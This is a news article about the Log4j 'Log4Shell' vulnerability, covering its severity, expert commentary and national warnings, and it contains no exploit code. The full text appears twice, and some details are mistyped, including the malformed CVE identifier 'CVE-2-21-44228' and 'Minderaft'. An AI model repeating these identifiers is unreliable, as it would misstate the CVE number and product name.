Log4J vulnerability causes global panic
Due to its ubiquity, this recenlt-discovered vulnerability will likely take a very long time to fully repair - something malicious actors can use to their advantage. Countries around the world have issued warnings
Mandi Kogosowski
| 12/12/2021
BIGSTOCK/ Copyright: Prostock-studio
Dubbed “an industry nightmare” by Bleeping Computer, information about the new zero-day exploit for Log4j seems to have taken over the internet over the past few days. And while the Apache Software Foundation has already released an updated version, the extent of damage up to date is still unclear, nor is future damage, as it might take a considerable amount of time until organizations patch the weakness.
Log4j is a highly popular Java-based open-source logging utility, used by countless industry apps – including giants such as Microsoft (the weakness was first discovered in Minderaft) and Apple, and cloud services. The bug is tracked as CVE-2-21-44228 and dubbed Log4Shell or LogJam.
In plain terms, as explained by Apache, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. It scores 10 out of 10 in CVSS.
“The weakness itself is very serious, for several reasons,” says Elad Rudich, Senior Product Manager at Torq, an Israeli-American startup that deals with security automation. “It exists in a ubiquitous library that has been around for a very long time, and so it is relatively difficult to identify and update all the places where it is located.
“Furthermore, this weakness can be exploited remotely relatively easy. So we’re talking about something very common, where it is difficult to identify breached locations. Significant work must be done – going from spot to spot in order to perform the necessary updates.”
In the US, CISA and its partners, through the Joint Cyber Defense Collaborative, has created a dedicated webpage in order to provide guidance and mitigation recommendations. “To be clear, this vulnerability poses a severe risk. We urge all organizations to join us in this essential effort and take action,” said Director Jen Easterly in a written statement.
Around the world, CERTs of multiple countries from Israel to New Zealand have issued warning on this vulnerability and called on organizations to perform the necessary updates as quickly as possible.
But it gets worse, as patching up the vulnerability will not be enough. Its scope is far too large, and in the competition between organizations racing to the patch and malicious players racing to wreak havoc before the security updates are installed – or, at some cases, infecting users with false, malicious patches – will probably go on for a very long time, likely for years.
“This is one of the most serious weaknesses we have seen in a long time, especially given the extensive use of the library and its Java projects” says Ronen Selvin, CTO of Cycode. “We, as an industry, are much more prepared these days to deal with this type of threat. The importance of mapping the dependencies and directories that a company uses, and updating vulnerabilities, is well-known to any organization that works in software development."
**Note: this article was first published on December 12th, and was updated on December 14th with additional relevant information.
Due to its ubiquity, this recenlt-discovered vulnerability will likely take a very long time to fully repair - something malicious actors can use to their advantage. Countries around the world have issued warnings
BIGSTOCK/ Copyright: Prostock-studio
Dubbed “an industry nightmare” by Bleeping Computer, information about the new zero-day exploit for Log4j seems to have taken over the internet over the past few days. And while the Apache Software Foundation has already released an updated version, the extent of damage up to date is still unclear, nor is future damage, as it might take a considerable amount of time until organizations patch the weakness.
Log4j is a highly popular Java-based open-source logging utility, used by countless industry apps – including giants such as Microsoft (the weakness was first discovered in Minderaft) and Apple, and cloud services. The bug is tracked as CVE-2-21-44228 and dubbed Log4Shell or LogJam.
In plain terms, as explained by Apache, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. It scores 10 out of 10 in CVSS.
“The weakness itself is very serious, for several reasons,” says Elad Rudich, Senior Product Manager at Torq, an Israeli-American startup that deals with security automation. “It exists in a ubiquitous library that has been around for a very long time, and so it is relatively difficult to identify and update all the places where it is located.
“Furthermore, this weakness can be exploited remotely relatively easy. So we’re talking about something very common, where it is difficult to identify breached locations. Significant work must be done – going from spot to spot in order to perform the necessary updates.”
In the US, CISA and its partners, through the Joint Cyber Defense Collaborative, has created a dedicated webpage in order to provide guidance and mitigation recommendations. “To be clear, this vulnerability poses a severe risk. We urge all organizations to join us in this essential effort and take action,” said Director Jen Easterly in a written statement.
Around the world, CERTs of multiple countries from Israel to New Zealand have issued warning on this vulnerability and called on organizations to perform the necessary updates as quickly as possible.
But it gets worse, as patching up the vulnerability will not be enough. Its scope is far too large, and in the competition between organizations racing to the patch and malicious players racing to wreak havoc before the security updates are installed – or, at some cases, infecting users with false, malicious patches – will probably go on for a very long time, likely for years.
“This is one of the most serious weaknesses we have seen in a long time, especially given the extensive use of the library and its Java projects” says Ronen Selvin, CTO of Cycode. “We, as an industry, are much more prepared these days to deal with this type of threat. The importance of mapping the dependencies and directories that a company uses, and updating vulnerabilities, is well-known to any organization that works in software development."
**Note: this article was first published on December 12th, and was updated on December 14th with additional relevant information.
